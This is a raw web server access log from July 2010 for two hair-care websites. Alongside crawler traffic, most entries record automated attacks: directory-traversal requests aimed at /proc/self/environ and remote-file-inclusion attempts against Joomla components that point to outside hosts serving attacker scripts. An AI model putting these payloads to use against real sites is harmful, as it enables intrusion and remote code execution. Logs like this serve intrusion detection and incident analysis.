24.148.13.80 - - [11/Jul/2010:17:00:36 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
24.148.13.80 - - [11/Jul/2010:17:00:56 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
24.148.13.80 - - [11/Jul/2010:17:04:16 -0700] "GET /logs/access_100614.log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
24.148.13.80 - - [11/Jul/2010:17:04:17 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
24.148.13.80 - - [11/Jul/2010:17:04:17 -0700] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.195.114.60 - - [11/Jul/2010:17:05:26 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.114.60 - - [11/Jul/2010:17:05:26 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
24.148.13.80 - - [11/Jul/2010:17:06:45 -0700] "GET /logs/access.log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
24.148.13.80 - - [11/Jul/2010:17:06:45 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
24.148.13.80 - - [11/Jul/2010:17:06:45 -0700] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
77.88.25.28 - - [11/Jul/2010:17:15:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12048 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.freehairsecrets.com"
77.88.25.28 - - [11/Jul/2010:17:23:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13463 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "growlonghairfast.com"
112.105.117.85 - - [11/Jul/2010:17:36:28 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
112.105.117.85 - - [11/Jul/2010:17:36:29 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
38.99.90.148 - - [11/Jul/2010:17:39:00 -0700] "GET /logs/access_100628.log%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://opus-02.com/contact/bovsp.txt?&mode=id HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
38.99.90.148 - - [11/Jul/2010:17:39:00 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://opus-02.com/contact/bovsp.txt?&mode=id HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
38.99.90.148 - - [11/Jul/2010:17:39:05 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://opus-02.com/contact/bovsp.txt?&mode=id HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
91.212.226.210 - - [11/Jul/2010:17:51:29 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "growlonghairfast.com"
91.212.226.210 - - [11/Jul/2010:17:51:29 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "growlonghairfast.com"
91.212.226.210 - - [11/Jul/2010:18:02:06 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "freehairsecrets.com"
91.212.226.210 - - [11/Jul/2010:18:02:06 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:18:06:36 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "growlonghairfast.com"
38.99.90.148 - - [11/Jul/2010:18:20:17 -0700] "GET /logs/access_100628.log%20/http://opus-02.com/contact/bovsp.txt?&mode=id HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
38.99.90.148 - - [11/Jul/2010:18:20:23 -0700] "GET /logs/http://opus-02.com/contact/bovsp.txt?&mode=id HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
38.99.90.148 - - [11/Jul/2010:18:20:23 -0700] "GET /http://opus-02.com/contact/bovsp.txt?&mode=id HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:18:21:21 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "growlonghairfast.com"
216.18.213.162 - - [11/Jul/2010:18:21:55 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:18:32:53 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
66.249.65.228 - - [11/Jul/2010:18:33:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15310 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
66.249.65.199 - - [11/Jul/2010:18:34:49 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
66.249.65.199 - - [11/Jul/2010:18:34:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16756 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
66.249.65.246 - - [11/Jul/2010:18:38:01 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14569 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:38:31 -0700] "GET /index.php?option=com_php&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:38:31 -0700] "GET /index.php?option=com_php&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:38:31 -0700] "GET /index.php?option=com_php&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:38:41 -0700] "GET /index.php?option=com_php&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:38:41 -0700] "GET /index.php?option=com_php&id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.249.65.228 - - [11/Jul/2010:18:39:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17981 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
66.249.65.246 - - [11/Jul/2010:18:42:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14102 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:18:43:56 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "growlonghairfast.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /logs/access.log/index.php?option=com_php&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /logs/access.log/index.php?option=com_php&id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /index.php?option=com_php&id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /logs/access.log/index.php?option=com_php&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /logs/access.log/index.php?option=com_php&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /index.php?option=com_php&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /logs/index.php?option=com_php&id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /index.php?option=com_php&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /logs/index.php?option=com_php&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /logs/index.php?option=com_php&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /index.php?option=com_php&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:34 -0700] "GET /logs/index.php?option=com_php&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:35 -0700] "GET /logs/access.log/index.php?option=com_php&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:35 -0700] "GET /index.php?option=com_php&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.34.178.107 - - [11/Jul/2010:18:45:35 -0700] "GET /logs/index.php?option=com_php&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
88.80.209.57 - - [11/Jul/2010:18:51:10 -0700] "GET /components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:18:51:10 -0700] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:18:51:10 -0700] "GET /logs/access_100614.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:18:53:05 -0700] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:18:53:05 -0700] "GET /components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:18:53:05 -0700] "GET /logs/access_100614.log//components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:18:56:08 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:56:40 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:56:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:56:40 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:57:59 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:57:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:57:59 -0700] "GET /logs/access_100322.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:59:23 -0700] "GET /logs/access_100315.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:59:45 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:59:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:59:46 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:18:59:46 -0700] "GET /logs/access_100104.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
151.97.124.201 - - [11/Jul/2010:19:03:09 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:03:09 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:03:09 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:03:09 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:04:21 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:04:21 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:04:22 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
79.244.111.19 - - [11/Jul/2010:19:05:39 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.19 - - [11/Jul/2010:19:05:39 -0700] "GET /logs/access_100628.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.19 - - [11/Jul/2010:19:05:39 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.19 - - [11/Jul/2010:19:08:55 -0700] "GET /logs/access_100705.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.19 - - [11/Jul/2010:19:09:12 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.244.111.19 - - [11/Jul/2010:19:09:12 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.244.111.19 - - [11/Jul/2010:19:09:12 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:19:09:17 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "growlonghairfast.com"
79.244.111.19 - - [11/Jul/2010:19:09:24 -0700] "GET /logs/access_100628.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.19 - - [11/Jul/2010:19:09:39 -0700] "GET /logs/access_100705.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.19 - - [11/Jul/2010:19:09:39 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.80.209.57 - - [11/Jul/2010:19:10:34 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:19:10:34 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:19:10:34 -0700] "GET /logs/access_100419.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.38.75.132 - - [11/Jul/2010:19:13:57 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
79.110.132.245 - - [11/Jul/2010:19:16:33 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:19:16:33 -0700] "GET /logs/access_100322.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:19:16:33 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:19:16:40 -0700] "GET /logs/access_100315.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:19:17:13 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:19:17:13 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:19:17:13 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [11/Jul/2010:19:17:18 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://szeged.sob.hu/lap/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:19:17:20 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:19:17:20 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:19:17:20 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [11/Jul/2010:19:17:24 -0700] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
65.23.129.32 - - [11/Jul/2010:19:21:11 -0700] "GET /logs/access.log//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:21:12 -0700] "GET /logs/access.log//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:21:12 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:21:12 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:21:12 -0700] "GET /logs//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:21:12 -0700] "GET /logs//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:21:13 -0700] "GET /logs/access.log//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:21:13 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.23.129.32 - - [11/Jul/2010:19:21:13 -0700] "GET /logs//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
